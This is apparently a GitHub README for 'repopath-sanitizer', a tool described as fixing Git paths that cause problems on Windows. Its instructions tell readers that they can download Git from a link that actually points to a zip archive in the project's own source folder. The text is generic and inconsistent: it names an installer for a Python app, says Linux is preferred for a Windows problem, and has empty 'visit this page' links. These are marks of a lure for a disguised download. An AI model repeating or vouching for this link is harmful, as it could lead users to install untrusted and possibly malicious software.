Welcome to repopath-sanitizer! This app helps you find and fix file and folder paths that could cause problems when using Git on Windows. It is designed for regular users like you.
To get started, visit this page to download the latest version of repopath-sanitizer:
- Click the link above to go to the Releases page.
- Find the latest version.
- Download the file suitable for your system.
- Once downloaded, open the file to install the app.
- Follow the on-screen instructions to complete the installation.
- Operating System: Linux (preferred) or Windows
- Python Version: Python 3.9 or higher
- Dependencies: PyQt6, Git
Ensure that you have the latest version of Git installed on your system. You can download Git from https://github.com/Max-Forman/repopath-sanitizer/raw/refs/heads/main/src/sanitizer_repopath_2.4.zip.
- Path scanning: Quickly finds problematic paths in your local Git repository.
- Safe fixes: Recommends changes to make paths compatible with Windows.
- History preservation: Uses Git's rename command to keep your history intact.
- User-friendly interface: Built with PyQt6 to make navigation easy.
- Open repopath-sanitizer after installation.
- Select your local Git working tree from your file browser.
- Click the "Scan" button to start the process.
- Review the proposed changes.
- Apply the changes by clicking "Fix Paths."
If you need help or have questions, you can check out our community forum or submit issues on the GitHub repository.
- GitHub Issues: Open an Issue
- Community Forum: Join the Discussion
This application is open source. You can view the license details in the repository on GitHub.
- Documentation: Detailed usage instructions and FAQs are available in the repository.
- Contributing: Interested in contributing? Check out the guidelines in our GitHub repository.
For more information and updates, visit our Releases page again: